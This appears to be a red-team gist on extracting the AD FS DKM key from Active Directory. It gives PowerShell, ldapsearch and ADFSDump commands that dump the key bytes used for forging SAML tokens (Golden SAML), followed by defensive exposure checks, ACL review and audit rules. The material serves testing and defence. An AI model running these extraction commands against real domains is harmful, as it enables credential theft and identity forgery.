Gist: justaguywhocodes/691b5140cba19f4bf052508d649a8b29
Commands to test/demonstrate this TTP (testing/red-team purposes only)

Background: AD FS stores its token-signing and token-decrypting certificates in the configuration database (WID or SQL) with the private keys encrypted under a key that is protected by the Distributed Key Manager (DKM). The DKM master key itself lives in Active Directory, in the domain partition under CN=ADFS,CN=Microsoft,CN=Program Data,DC=contoso,DC=com, inside a contact object whose thumbnailPhoto attribute holds the raw key bytes. By default only the AD FS service account (plus Domain Admins and SYSTEM on the domain controllers) can read it. The key is not in the Configuration partition, and it has nothing to do with msDS-KeyCredentialLink (that attribute carries Windows Hello for Business / shadow-credential public keys). Whoever can read the DKM key and the encrypted certificate blob can decrypt the token-signing key and forge SAML tokens (Golden SAML).

1. Using PowerShell (AD module) – Recommended for testing

```powershell
Import-Module ActiveDirectory

$domainDN = (Get-ADDomain).DistinguishedName
$dkmBase  = "CN=ADFS,CN=Microsoft,CN=Program Data,$domainDN"

# Locate the DKM container. AD FS creates a GUID-named sub-container under
# CN=ADFS,CN=Microsoft,CN=Program Data in the domain partition.
Get-ADObject -SearchBase $dkmBase -SearchScope Subtree -Filter { objectClass -eq "container" } |
    Select-Object Name, DistinguishedName

# Read the key material: the contact objects under that container. The contact
# named CryptoPolicy has a displayName that matches the 'l' attribute of the
# contact holding the key currently in use; dumping all of them is simplest.
Get-ADObject -SearchBase $dkmBase -SearchScope Subtree -Filter { objectClass -eq "contact" } `
    -Properties displayName, l, thumbnailPhoto |
    ForEach-Object {
        [pscustomobject]@{
            Name        = $_.Name
            DisplayName = $_.displayName
            L           = $_.l
            KeyHex      = if ($_.thumbnailPhoto) { ($_.thumbnailPhoto | ForEach-Object { $_.ToString("x2") }) -join "" }
        }
    }
```

The thumbnailPhoto value is a plain byte array (the DKM key), not a KeyCredential blob. On its own it is useless; it is combined with the encrypted token-signing certificate exported from the AD FS configuration database.

2. Using ldapsearch (from Windows/Linux with LDAP client tools)

```bash
# Locate the DKM container (domain partition, not the Configuration partition).
# -x selects simple bind, which is what a UPN-style -D needs.
ldapsearch -x -H ldap://dc01.contoso.com -D "user@contoso.com" -W \
  -b "CN=ADFS,CN=Microsoft,CN=Program Data,DC=contoso,DC=com" \
  -s sub "(objectClass=container)" dn

# Extract the key: every contact object under the container. ldapsearch prints
# binary attributes base64-encoded ("thumbnailPhoto:: ..."); decode before use.
ldapsearch -x -H ldap://dc01.contoso.com -D "user@contoso.com" -W \
  -b "CN=ADFS,CN=Microsoft,CN=Program Data,DC=contoso,DC=com" \
  -s sub "(objectClass=contact)" displayName l thumbnailPhoto
```

3. Using ADFSDump (public tool by Mandiant)

```powershell
# https://github.com/mandiant/ADFSDump
# Run on the AD FS server in the context of the AD FS service account: that
# account is the one that can both query the configuration database (WID named
# pipe) and read the DKM key from AD.
.\ADFSDump.exe /domain:contoso.com /user:user /password:pass
```

ADFSDump collects the encrypted token-signing certificate blob from the configuration database together with the DKM key from AD. Decrypting the certificate and minting tokens with it is done by its companion tool ADFSpoof (https://github.com/mandiant/ADFSpoof).

4. Certify

Certify (GhostPack) enumerates and abuses AD CS certificate templates; it has no AD FS functionality, no `/adfs` switch and no `adfskey` command. The public tool chain for this TTP is ADFSDump (collection) plus ADFSpoof (decryption and token forging).

How to test if you are vulnerable (defensive/blue-team check)

Run this as a regular domain user. Note that AD does not throw an error for attributes you are not allowed to read: it silently omits them, or returns no object at all if you cannot list the container. So the check has to look for actual key bytes, not for an exception.

```powershell
Import-Module ActiveDirectory

$domainDN = (Get-ADDomain).DistinguishedName
$dkmBase  = "CN=ADFS,CN=Microsoft,CN=Program Data,$domainDN"

$keys = @()
try {
    $keys = @(Get-ADObject -SearchBase $dkmBase -SearchScope Subtree `
        -Filter { objectClass -eq "contact" } -Properties thumbnailPhoto -ErrorAction Stop |
        Where-Object { $_.thumbnailPhoto })
} catch {
    # Container not visible to this user (or AD FS not present in this domain): nothing leaked.
}

if ($keys.Count -gt 0) {
    Write-Warning "VULNERABLE: $($keys.Count) DKM contact object(s) with readable key bytes as $env:USERDOMAIN\$env:USERNAME"
} else {
    Write-Host "OK: no DKM key material readable as $env:USERDOMAIN\$env:USERNAME"
}
```
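The check above only tells you whether the one account you ran it as can read the key. To find out who else can, review the ACL of the DKM container and everything under it, and put a read audit on it so that future reads show up as directory-service-access events. The following is an added example written for this page (not code from the gist author or from Mandiant); the expected-principal list, the `CONTOSO` domain name and the `svc_adfs` service account name are assumptions to adapt to your environment. Reading SACLs and calling Set-Acl requires a privileged account.

```powershell
Import-Module ActiveDirectory

$domainDN = (Get-ADDomain).DistinguishedName
$dkmBase  = "CN=ADFS,CN=Microsoft,CN=Program Data,$domainDN"

# Assumed set of principals that legitimately need read access to the DKM key.
# Replace svc_adfs with the actual AD FS service account (or gMSA) in use.
$expected = @(
    "NT AUTHORITY\SYSTEM",
    "CONTOSO\Domain Admins",
    "CONTOSO\Enterprise Admins",
    "CONTOSO\svc_adfs"
)

# Any of these rights lets the holder read thumbnailPhoto.
$readRights = [System.DirectoryServices.ActiveDirectoryRights]::ReadProperty -bor
              [System.DirectoryServices.ActiveDirectoryRights]::GenericRead -bor
              [System.DirectoryServices.ActiveDirectoryRights]::GenericAll

function Get-DkmUnexpectedReaders {
    # Lists Allow ACEs on the DKM container tree that grant read and belong to a
    # principal outside $expected. Subtree scope includes the base object itself.
    Get-ADObject -SearchBase $dkmBase -SearchScope Subtree -Filter * | ForEach-Object {
        $acl = Get-Acl -Path "AD:\$($_.DistinguishedName)"
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne "Allow") { continue }
            if ([int]($ace.ActiveDirectoryRights -band $readRights) -eq 0) { continue }
            if ($expected -contains $ace.IdentityReference.Value) { continue }
            [pscustomobject]@{
                Object    = $_.DistinguishedName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.ActiveDirectoryRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

function Enable-DkmReadAudit {
    # Adds a success audit ACE (Everyone, ReadProperty, inherited by child objects)
    # to the DKM container. With "Audit Directory Service Access" enabled on the
    # DCs, every read of the key material then produces a 4662 event naming the
    # reader and the object, which is what a detection rule should key on.
    $everyone = New-Object System.Security.Principal.SecurityIdentifier("S-1-1-0")
    $rule = New-Object System.DirectoryServices.ActiveDirectoryAuditRule(
        $everyone,
        [System.DirectoryServices.ActiveDirectoryRights]::ReadProperty,
        [System.Security.AccessControl.AuditFlags]::Success,
        [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All
    )
    $acl = Get-Acl -Path "AD:\$dkmBase" -Audit
    $acl.AddAuditRule($rule)
    Set-Acl -Path "AD:\$dkmBase" -AclObject $acl
}

# Usage: report first, then decide whether to enable auditing.
Get-DkmUnexpectedReaders | Format-Table -AutoSize
# Enable-DkmReadAudit
```

Anything this reports that is not the AD FS service account or a tier-0 admin group is a finding: the DKM container should not inherit the domain's default read permissions, and an ACE for Authenticated Users or a broad group there is exactly the misconfiguration the check in the previous section detects from the attacker's side.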